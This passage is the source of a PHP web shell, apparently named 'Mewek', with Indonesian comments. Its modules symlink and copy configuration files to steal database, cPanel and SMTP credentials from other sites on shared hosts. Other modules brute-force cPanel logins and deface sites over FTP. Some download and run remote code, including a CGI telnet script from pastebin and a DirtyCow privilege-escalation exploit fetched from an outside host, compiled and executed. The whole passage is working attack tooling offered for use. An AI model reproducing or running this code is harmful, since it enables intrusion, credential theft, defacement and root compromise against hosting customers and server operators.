symlink('/var/www/vhosts/'.$sitess.'/httpdocs/whmcs/configuration.php',$sitess.'-whmcs.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/support/configuration.php',$sitess.'-support.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/supp/configuration.php',$sitess.'-supp.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/secure/configuration.php',$sitess.'-sucure.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/secure/whm/configuration.php',$sitess.'-sucure-whm.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/secure/whmcs/configuration.php',$sitess.'-sucure-whmcs.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/cpanel/configuration.php',$sitess.'-cpanel.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/panel/configuration.php',$sitess.'-panel.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/host/configuration.php',$sitess.'-host.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/hosting/configuration.php',$sitess.'-hosting.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/hosts/configuration.php',$sitess.'-hosts.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/configuration.php',$sitess.'-joomla.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/submitticket.php',$sitess.'-whmcs2.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/clients/configuration.php',$sitess.'-clients.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/client/configuration.php',$sitess.'-client.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/clientes/configuration.php',$sitess.'-clientes.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/cliente/configuration.php',$sitess.'-client.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/clientsupport/configuration.php',$sitess.'-clientsupport.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/billing/configuration.php',$sitess.'-billing.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/manage/configuration.php',$sitess.'-whm-manage.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/my/configuration.php',$sitess.'-whm-my.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/myshop/configuration.php',$sitess.'-whm-myshop.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/includes/dist-configure.php',$sitess.'-zencart.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/zencart/includes/dist-configure.php',$sitess.'-shop-zencart.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/shop/includes/dist-configure.php',$sitess.'-shop-ZCshop.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/Settings.php',$sitess.'-smf.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/smf/Settings.php',$sitess.'-smf2.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/forum/Settings.php',$sitess.'-smf-forum.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/forums/Settings.php',$sitess.'-smf-forums.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/upload/includes/config.php',$sitess.'-up.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/article/config.php',$sitess.'-Nwahy.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/up/includes/config.php',$sitess.'-up2.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/conf_global.php',$sitess.'-6.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/include/db.php',$sitess.'-7.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/connect.php',$sitess.'-PHP-Fusion.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/mk_conf.php',$sitess.'-9.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/config.php',$sitess.'-4images.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/sites/default/settings.php',$sitess.'-Drupal.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/member/configuration.php',$sitess.'-1member.txt') ; 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/billings/configuration.php',$sitess.'-billings.txt') ; 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/whm/configuration.php',$sitess.'-whm.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/supports/configuration.php',$sitess.'-supports.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/requires/config.php',$sitess.'-AM4SS-hosting.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/supports/includes/iso4217.php',$sitess.'-hostbills-supports.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/client/includes/iso4217.php',$sitess.'-hostbills-client.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/support/includes/iso4217.php',$sitess.'-hostbills-support.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/billing/includes/iso4217.php',$sitess.'-hostbills-billing.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/billings/includes/iso4217.php',$sitess.'-hostbills-billings.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/host/includes/iso4217.php',$sitess.'-hostbills-host.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/hosts/includes/iso4217.php',$sitess.'-hostbills-hosts.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/hosting/includes/iso4217.php',$sitess.'-hostbills-hosting.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/hostings/includes/iso4217.php',$sitess.'-hostbills-hostings.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/includes/iso4217.php',$sitess.'-hostbills.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/hostbillincludes/iso4217.php',$sitess.'-hostbills-hostbills.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/includes/iso4217.php',$sitess.'-hostbills-hostbill.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/app/etc/local.xml',$sitess.'-Magento.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/admin/config.php',$sitess.'-Opencart.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/config/settings.inc.php',$sitess.'-Prestashop.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/config/koneksi.php',$sitess.'-Lokomedia.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/lokomedia/config/koneksi.php',$sitess.'-Lokomedia.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/slconfig.php',$sitess.'-Sitelock.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/application/config/database.php',$sitess.'-Ellislab.txt');
}
print "Location: ./\n\n";";
  1078. $file = "mewek_config/vhost.cin";
  1079. $handle = fopen($file ,"w+");
  1080. fwrite($handle ,base64_decode($vhost));
  1081. fclose($handle);
  1082. chmod($file, 0755);
  1083. if(exe("cd mewek_config && ./vhost.cin")) {
  1084. echo "<center><a href='$link_config/mewek_config'><font color=#4c83af>Done</font></a></center>";
  1085. } else {
  1086. echo "<center><a href='$link_config/mewek_config/vhost.cin'><font color=#4c83af>Done</font></a></center>";
  1087. }
  1088.  
  1089. } else {
  1090. $etc = fopen("/etc/passwd", "r") or die("<pre><font color=red>Can't read /etc/passwd</font></pre>");
  1091. while($passwd = fgets($etc)) {
  1092. if($passwd == "" || !$etc) {
  1093. echo "<font color=red>Can't read /etc/passwd</font>";
  1094. } else {
  1095. preg_match_all('/(.*?):x:/', $passwd, $user_config);
  1096. foreach($user_config[1] as $user_idx) {
  1097. $user_config_dir = "/home/$user_idx/public_html/";
  1098. if(is_readable($user_config_dir)) {
  1099. $grab_config = array(
  1100. "/home/$user_idx/.my.cnf" => "cpanel",
  1101. "/home/$user_idx/.accesshash" => "WHM-accesshash",
  1102. "$user_config_dir/po-content/config.php" => "Popoji",
  1103. "$user_config_dir/vdo_config.php" => "Voodoo",
  1104. "$user_config_dir/bw-configs/config.ini" => "BosWeb",
  1105. "$user_config_dir/config/koneksi.php" => "Lokomedia",
  1106. "$user_config_dir/lokomedia/config/koneksi.php" => "Lokomedia",
  1107. "$user_config_dir/clientarea/configuration.php" => "WHMCS",
  1108. "$user_config_dir/whm/configuration.php" => "WHMCS",
  1109. "$user_config_dir/whmcs/configuration.php" => "WHMCS",
  1110. "$user_config_dir/forum/config.php" => "phpBB",
  1111. "$user_config_dir/sites/default/settings.php" => "Drupal",
  1112. "$user_config_dir/config/settings.inc.php" => "PrestaShop",
  1113. "$user_config_dir/app/etc/local.xml" => "Magento",
  1114. "$user_config_dir/joomla/configuration.php" => "Joomla",
  1115. "$user_config_dir/configuration.php" => "Joomla",
  1116. "$user_config_dir/wp/wp-config.php" => "WordPress",
  1117. "$user_config_dir/wordpress/wp-config.php" => "WordPress",
  1118. "$user_config_dir/wp-config.php" => "WordPress",
  1119. "$user_config_dir/admin/config.php" => "OpenCart",
  1120. "$user_config_dir/slconfig.php" => "Sitelok",
  1121. "$user_config_dir/application/config/database.php" => "Ellislab");
  1122. foreach($grab_config as $config => $nama_config) {
  1123. $ambil_config = file_get_contents($config);
  1124. if($ambil_config == '') {
  1125. } else {
  1126. $file_config = fopen("mewek_config/$user_mewek-$nama_config.txt","w");
  1127. fputs($file_config,$ambil_config);
  1128. }
  1129. }
  1130. }
  1131. }
  1132. }
  1133. }
  1134. echo "<center><a href='?dir=$dir/mewek_config'><font color=#4c83af>Done</font></a></center>";
  1135. }
  1136. }
  1137. // Jumping Exploiter
  1138. elseif($_GET['do'] == 'jumping') {
  1139. $i = 0;
  1140. echo "<div class='margin: 5px auto;'>";
  1141. if(preg_match("/hsphere/", $dir)) {
  1142. $urls = explode("\r\n", $_POST['url']);
  1143. if(isset($_POST['jump'])) {
  1144. echo "<pre>";
  1145. foreach($urls as $url) {
  1146. $url = str_replace(array("http://","www."), "", strtolower($url));
  1147. $etc = "/etc/passwd";
  1148. $f = fopen($etc,"r");
  1149. while($gets = fgets($f)) {
  1150. $pecah = explode(":", $gets);
  1151. $user = $pecah[0];
  1152. $dir_user = "/hsphere/local/home/$user";
  1153. if(is_dir($dir_user) === true) {
  1154. $url_user = $dir_user."/".$url;
  1155. if(is_readable($url_user)) {
  1156. $i++;
  1157. $jrw = "[<font color=#4c83af>R</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
  1158. if(is_writable($url_user)) {
  1159. $jrw = "[<font color=#4c83af>RW</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
  1160. }
  1161. echo $jrw."<br>";
  1162. }
  1163. }
  1164. }
  1165. }
  1166. if($i == 0) {
  1167. } else {
  1168. echo "<br>Total ada ".$i." Kamar di ".$ip;
  1169. }
  1170. echo "</pre>";
  1171. } else {
  1172. echo '<center>
  1173. <form method="post">
  1174. List Domains: <br>
  1175. <textarea name="url" style="width: 500px; height: 250px;">';
  1176. $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
  1177. while($getss = fgets($fp)) {
  1178. echo $getss;
  1179. }
  1180. echo '</textarea><br>
  1181. <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  1182. </form></center>';
  1183. }
  1184. } elseif(preg_match("/vhosts|vhost/", $dir)) {
  1185. preg_match("/\/var\/www\/(.*?)\//", $dir, $vh);
  1186. $urls = explode("\r\n", $_POST['url']);
  1187. if(isset($_POST['jump'])) {
  1188. echo "<pre>";
  1189. foreach($urls as $url) {
  1190. $url = str_replace("www.", "", $url);
  1191. $web_vh = "/var/www/".$vh[1]."/$url/httpdocs";
  1192. if(is_dir($web_vh) === true) {
  1193. if(is_readable($web_vh)) {
  1194. $i++;
  1195. $jrw = "[<font color=#4c83af>R</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
  1196. if(is_writable($web_vh)) {
  1197. $jrw = "[<font color=#4c83af>RW</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
  1198. }
  1199. echo $jrw."<br>";
  1200. }
  1201. }
  1202. }
  1203. if($i == 0) {
  1204. } else {
  1205. echo "<br>Total ada ".$i." Kamar di ".$ip;
  1206. }
  1207. echo "</pre>";
  1208. } else {
  1209. echo '<center>
  1210. <form method="post">
  1211. List Domains: <br>
  1212. <textarea name="url" style="width: 500px; height: 250px;">';
  1213. bing("ip:$ip");
  1214. echo '</textarea><br>
  1215. <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  1216. </form></center>';
  1217. }
  1218. } else {
  1219. echo "<pre>";
  1220. $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
  1221. while($passwd = fgets($etc)) {
  1222. if($passwd == '' || !$etc) {
  1223. echo "<font color=red>Can't read /etc/passwd</font>";
  1224. } else {
  1225. preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
  1226. foreach($user_jumping[1] as $user_idx_jump) {
  1227. $user_jumping_dir = "/home/$user_idx_jump/public_html";
  1228. if(is_readable($user_jumping_dir)) {
  1229. $i++;
  1230. $jrw = "[<font color=#4c83af>R</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  1231. if(is_writable($user_jumping_dir)) {
  1232. $jrw = "[<font color=#4c83af>RW</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  1233. }
  1234. echo $jrw;
  1235. if(function_exists('posix_getpwuid')) {
  1236. $domain_jump = file_get_contents("/etc/named.conf");
  1237. if($domain_jump == '') {
  1238. echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
  1239. } else {
  1240. preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
  1241. foreach($domains_jump[1] as $dj) {
  1242. $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  1243. $user_jumping_url = $user_jumping_url['name'];
  1244. if($user_jumping_url == $user_idx_jump) {
  1245. echo " => ( <u>$dj</u> )<br>";
  1246. break;
  1247. }
  1248. }
  1249. }
  1250. } else {
  1251. echo "<br>";
  1252. }
  1253. }
  1254. }
  1255. }
  1256. }
  1257. if($i == 0) {
  1258. } else {
  1259. echo "<br>Total ada ".$i." Kamar di ".$ip;
  1260. }
  1261. echo "</pre>";
  1262. }
  1263. echo "</div>";
  1264. } elseif($_GET['do'] == 'cpanel') {
  1265. if($_POST['crack']) {
  1266. $usercp = explode("\r\n", $_POST['user_cp']);
  1267. $passcp = explode("\r\n", $_POST['pass_cp']);
  1268. $i = 0;
  1269. foreach($usercp as $ucp) {
  1270. foreach($passcp as $pcp) {
  1271. if(@mysql_connect('localhost', $ucp, $pcp)) {
  1272. if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  1273. } else {
  1274. $_SESSION[$ucp] = "1";
  1275. $_SESSION[$pcp] = "1";
  1276. if($ucp == '' || $pcp == '') {
  1277.  
  1278. } else {
  1279. $i++;
  1280. if(function_exists('posix_getpwuid')) {
  1281. $domain_cp = file_get_contents("/etc/named.conf");
  1282. if($domain_cp == '') {
  1283. $dom = "<font color=red>gabisa ambil nama domain nya</font>";
  1284. } else {
  1285. preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
  1286. foreach($domains_cp[1] as $dj) {
  1287. $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  1288. $user_cp_url = $user_cp_url['name'];
  1289. if($user_cp_url == $ucp) {
  1290. $dom = "<a href='http://$dj/' target='_blank'><font color=#4c83af>$dj</font></a>";
  1291. break;
  1292. }
  1293. }
  1294. }
  1295. } else {
  1296. $dom = "<font color=red>function is Disable by system</font>";
  1297. }
  1298. echo "username (<font color=#4c83af>$ucp</font>) password (<font color=#4c83af>$pcp</font>) domain ($dom)<br>";
  1299. }
  1300. }
  1301. }
  1302. }
  1303. }
  1304. if($i == 0) {
  1305. } else {
  1306. echo "<br>sukses nyolong ".$i." Cpanel by <font color=#4c83af>Mewek.</font>";
  1307. }
  1308. } else {
  1309. echo "<center>
  1310. <form method='post'>
  1311. USER: <br>
  1312. <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  1313. $_usercp = fopen("/etc/passwd","r");
  1314. while($getu = fgets($_usercp)) {
  1315. if($getu == '' || !$_usercp) {
  1316. echo "<font color=red>Can't read /etc/passwd</font>";
  1317. } else {
  1318. preg_match_all("/(.*?):x:/", $getu, $u);
  1319. foreach($u[1] as $user_cp) {
  1320. if(is_dir("/home/$user_cp/public_html")) {
  1321. echo "$user_cp\n";
  1322. }
  1323. }
  1324. }
  1325. }
  1326. echo "</textarea><br>
  1327. PASS: <br>
  1328. <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  1329. function cp_pass($dir) {
  1330. $pass = "";
  1331. $dira = scandir($dir);
  1332. foreach($dira as $dirb) {
  1333. if(!is_file("$dir/$dirb")) continue;
  1334. $ambil = file_get_contents("$dir/$dirb");
  1335. if(preg_match("/WordPress/", $ambil)) {
  1336. $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  1337. } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  1338. $pass .= ambilkata($ambil,"password = '","'")."\n";
  1339. } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  1340. $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
  1341. } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  1342. $pass .= ambilkata($ambil,'password = "','"')."\n";
  1343. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  1344. $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
  1345. } elseif(preg_match("/^[client]$/", $ambil)) {
  1346. preg_match("/password=(.*?)/", $ambil, $pass1);
  1347. if(preg_match('/"/', $pass1[1])) {
  1348. $pass1[1] = str_replace('"', "", $pass1[1]);
  1349. $pass .= $pass1[1]."\n";
  1350. } else {
  1351. $pass .= $pass1[1]."\n";
  1352. }
  1353. } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  1354. $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  1355. }
  1356. }
  1357. echo $pass;
  1358. }
  1359. $cp_pass = cp_pass($dir);
  1360. echo $cp_pass;
  1361. echo "</textarea><br>
  1362. <input type='submit' name='crack' style='width: 450px;' value='Crack'>
  1363. </form><br>
  1364. <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
  1365. }
  1366. }
  1367. // Cpanel/FTP auto deface tools
  1368. elseif($_GET['do'] == 'cpftp_auto') {
  1369. if($_POST['crack']) {
  1370. $usercp = explode("\r\n", $_POST['user_cp']);
  1371. $passcp = explode("\r\n", $_POST['pass_cp']);
  1372. $i = 0;
  1373. foreach($usercp as $ucp) {
  1374. foreach($passcp as $pcp) {
  1375. if(@mysql_connect('localhost', $ucp, $pcp)) {
  1376. if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  1377. } else {
  1378. $_SESSION[$ucp] = "1";
  1379. $_SESSION[$pcp] = "1";
  1380. if($ucp == '' || $pcp == '') {
  1381. //
  1382. } else {
  1383. echo "[+] username (<font color=#4c83af>$ucp</font>) password (<font color=#4c83af>$pcp</font>)<br>";
  1384. $ftp_conn = ftp_connect($ip);
  1385. $ftp_login = ftp_login($ftp_conn, $ucp, $pcp);
  1386. if((!$ftp_login) || (!$ftp_conn)) {
  1387. echo "[+] <font color=red>Login Gagal</font><br><br>";
  1388. } else {
  1389. echo "[+] <font color=#4c83af>Login Sukses</font><br>";
  1390. $fi = htmlspecialchars($_POST['file_deface']);
  1391. $deface = ftp_put($ftp_conn, "public_html/$fi", $_POST['deface'], FTP_BINARY);
  1392. if($deface) {
  1393. $i++;
  1394. echo "[+] <font color=#4c83af>Deface Sukses</font><br>";
  1395. if(function_exists('posix_getpwuid')) {
  1396. $domain_cp = file_get_contents("/etc/named.conf");
  1397. if($domain_cp == '') {
  1398. echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
  1399. } else {
  1400. preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
  1401. foreach($domains_cp[1] as $dj) {
  1402. $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  1403. $user_cp_url = $user_cp_url['name'];
  1404. if($user_cp_url == $ucp) {
  1405. echo "[+] <a href='http://$dj/$fi' target='_blank'>http://$dj/$fi</a><br><br>";
  1406. break;
  1407. }
  1408. }
  1409. }
  1410. } else {
  1411. echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
  1412. }
  1413. } else {
  1414. echo "[-] <font color=red>Deface Gagal</font><br><br>";
  1415. }
  1416. }
  1417. //echo "username (<font color=#4c83af>$ucp</font>) password (<font color=#4c83af>$pcp</font>)<br>";
  1418. }
  1419. }
  1420. }
  1421. }
  1422. }
  1423. if($i == 0) {
  1424. } else {
  1425. echo "<br>sukses deface ".$i." Cpanel by <font color=#4c83af>Mewek.</font>";
  1426. }
  1427. } else {
  1428. echo "<center>
  1429. <form method='post'>
  1430. Filename: <br>
  1431. <input type='text' name='file_deface' placeholder='index.php' value='index.php' style='width: 450px;'><br>
  1432. Deface Page: <br>
  1433. <input type='text' name='deface' placeholder='http://www.web-yang-udah-di-deface.com/filemu.php' style='width: 450px;'><br>
  1434. USER: <br>
  1435. <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  1436. $_usercp = fopen("/etc/passwd","r");
  1437. while($getu = fgets($_usercp)) {
  1438. if($getu == '' || !$_usercp) {
  1439. echo "<font color=red>Can't read /etc/passwd</font>";
  1440. } else {
  1441. preg_match_all("/(.*?):x:/", $getu, $u);
  1442. foreach($u[1] as $user_cp) {
  1443. if(is_dir("/home/$user_cp/public_html")) {
  1444. echo "$user_cp\n";
  1445. }
  1446. }
  1447. }
  1448. }
  1449. echo "</textarea><br>
  1450. PASS: <br>
  1451. <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  1452. function cp_pass($dir) {
  1453. $pass = "";
  1454. $dira = scandir($dir);
  1455. foreach($dira as $dirb) {
  1456. if(!is_file("$dir/$dirb")) continue;
  1457. $ambil = file_get_contents("$dir/$dirb");
  1458. if(preg_match("/WordPress/", $ambil)) {
  1459. $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  1460. } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  1461. $pass .= ambilkata($ambil,"password = '","'")."\n";
  1462. } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  1463. $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
  1464. } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  1465. $pass .= ambilkata($ambil,'password = "','"')."\n";
  1466. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  1467. $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
  1468. } elseif(preg_match("/client/", $ambil)) {
  1469. preg_match("/password=(.*)/", $ambil, $pass1);
  1470. if(preg_match('/"/', $pass1[1])) {
  1471. $pass1[1] = str_replace('"', "", $pass1[1]);
  1472. $pass .= $pass1[1]."\n";
  1473. }
  1474. } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  1475. $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  1476. }
  1477. }
  1478. echo $pass;
  1479. }
  1480. $cp_pass = cp_pass($dir);
  1481. echo $cp_pass;
  1482. echo "</textarea><br>
  1483. <input type='submit' name='crack' style='width: 450px;' value='Hajar'>
  1484. </form><br>
  1485. <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
  1486. }
  1487. }
  1488. // Grabe SMTP
  1489. elseif($_GET['do'] == 'smtp') {
  1490. echo "<center><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span></center><br>";
  1491. function scj($dir) {
  1492. $dira = scandir($dir);
  1493. foreach($dira as $dirb) {
  1494. if(!is_file("$dir/$dirb")) continue;
  1495. $ambil = file_get_contents("$dir/$dirb");
  1496. $ambil = str_replace("$", "", $ambil);
  1497. if(preg_match("/JConfig|joomla/", $ambil)) {
  1498. $smtp_host = ambilkata($ambil,"smtphost = '","'");
  1499. $smtp_auth = ambilkata($ambil,"smtpauth = '","'");
  1500. $smtp_user = ambilkata($ambil,"smtpuser = '","'");
  1501. $smtp_pass = ambilkata($ambil,"smtppass = '","'");
  1502. $smtp_port = ambilkata($ambil,"smtpport = '","'");
  1503. $smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
  1504. echo "SMTP Host: <font color=#4c83af>$smtp_host</font><br>";
  1505. echo "SMTP port: <font color=#4c83af>$smtp_port</font><br>";
  1506. echo "SMTP user: <font color=#4c83af>$smtp_user</font><br>";
  1507. echo "SMTP pass: <font color=#4c83af>$smtp_pass</font><br>";
  1508. echo "SMTP auth: <font color=#4c83af>$smtp_auth</font><br>";
  1509. echo "SMTP secure: <font color=#4c83af>$smtp_secure</font><br><br>";
  1510. }
  1511. }
  1512. }
  1513. $smpt_hunter = scj($dir);
  1514. echo $smpt_hunter;
  1515. }
  1516. // CGI Telnet Tools
  1517. elseif($_GET['do'] == 'cgi') {
  1518. $cgi_dir = mkdir('mewek_cgi', 0755);
  1519. $file_cgi = "mewek_cgi/cgi.izo";
  1520. $isi_htcgi = "AddHandler cgi-script .izo";
  1521. $htcgi = fopen(".htaccess", "w");
  1522. fwrite($htcgi, $isi_htcgi);
  1523. fclose($htcgi);
  1524. $cgi_script = getsource("http://pastebin.com/raw/Lj46KxFT");
  1525. $cgi = fopen($file_cgi, "w");
  1526. fwrite($cgi, $cgi_script);
  1527. fclose($cgi);
  1528. chmod($file_cgi, 0755);
  1529. echo "<iframe src='mewek_cgi/cgi.izo' width='100%' height='100%' frameborder='0' scrolling='no'></iframe>";
  1530. }
  1531. // Fake Root Exploiter
  1532. elseif($_GET['do'] == 'fake_root') {
  1533. ob_start();
  1534. $cwd = getcwd();
  1535. $ambil_user = explode("/", $cwd);
  1536. $user = $ambil_user[2];
  1537. if($_POST['reverse']) {
  1538. $site = explode("\r\n", $_POST['url']);
  1539. $file = $_POST['file'];
  1540. foreach($site as $url) {
  1541. $cek = getsource("$url/~$user/$file");
  1542. if(preg_match("/hacked/i", $cek)) {
  1543. echo "URL: <a href='$url/~$user/$file' target='_blank'>$url/~$user/$file</a> -> <font color=#4c83af>Fake Root!</font><br>";
  1544. }
  1545. }
  1546. } else {
  1547. echo "<center><form method='post'>
  1548. Filename: <br><input type='text' name='file' value='deface.html' size='50' height='10'><br>
  1549. User: <br><input type='text' value='$user' size='50' height='10' readonly><br>
  1550. Domain: <br>
  1551. <textarea style='width: 450px; height: 250px;' name='url'>";
  1552. reverse($_SERVER['HTTP_HOST']);
  1553. echo "</textarea><br>
  1554. <input type='submit' name='reverse' value='Scan Fake Root!' style='width: 450px;'>
  1555. </form><br>
  1556. NB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.</center>";
  1557. }
  1558. }
  1559. // Adminer Exploiter
  1560. elseif($_GET['do'] == 'adminer') {
  1561. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  1562. function adminer($url, $isi) {
  1563. $fp = fopen($isi, "w");
  1564. $ch = curl_init();
  1565. curl_setopt($ch, CURLOPT_URL, $url);
  1566. curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
  1567. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  1568. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  1569. curl_setopt($ch, CURLOPT_FILE, $fp);
  1570. return curl_exec($ch);
  1571. curl_close($ch);
  1572. fclose($fp);
  1573. ob_flush();
  1574. flush();
  1575. }
  1576. if(file_exists('adminer.php')) {
  1577. echo "<center><font color=#4c83af><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  1578. } else {
  1579. if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
  1580. echo "<center><font color=#4c83af><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  1581. } else {
  1582. echo "<center><font color=red>gagal buat file adminer</font></center>";
  1583. }
  1584. }
  1585. }
  1586. // Auto Root Tools >> Masih Dalam Proses Pengembangan
  1587. elseif($_GET['do'] == 'awto_root') {
  1588. // Proses Download Cowroot >> link dirty sesuaikan dengan dirty klean ea :) .. spa tw pnya w mati
  1589. file_put_contents("evil.c", file_get_contents("http://haxorid.com/dirty.c"));
  1590.  
  1591. // Proses Pengecekan dan Ekseskusi
  1592. $gccevil = shell_exec('gcc -pthread evil.c -o mewek -lcrypt');
  1593. $hakakses = shell_exec('chmod +x mewek');
  1594. $eksekusiphx = shell_exec('./mewek mewek123');
  1595. $startbanner = '4ut0 r00t H45 B3n St4rt';
  1596.  
  1597. // Syntax Eksekusi
  1598. // gcc -pthread evil.c -o Mewek -lcrypt
  1599. // chmod +x Mewek
  1600. // ./Mewek Mewek123 << Mewek123 bisa anda ganti dengan password yg lain
  1601.  
  1602. // Output Program
  1603. echo "<center id='info'>";
  1604. echo $gccevil;
  1605. echo $hakakses;
  1606. echo "<h2>";
  1607. echo $startbanner;
  1608. echo "</h2>";
  1609. echo "<textarea>";
  1610. echo $eksekusiphx;
  1611. echo "</textarea>";
  1612. echo "</center>";
  1613. }
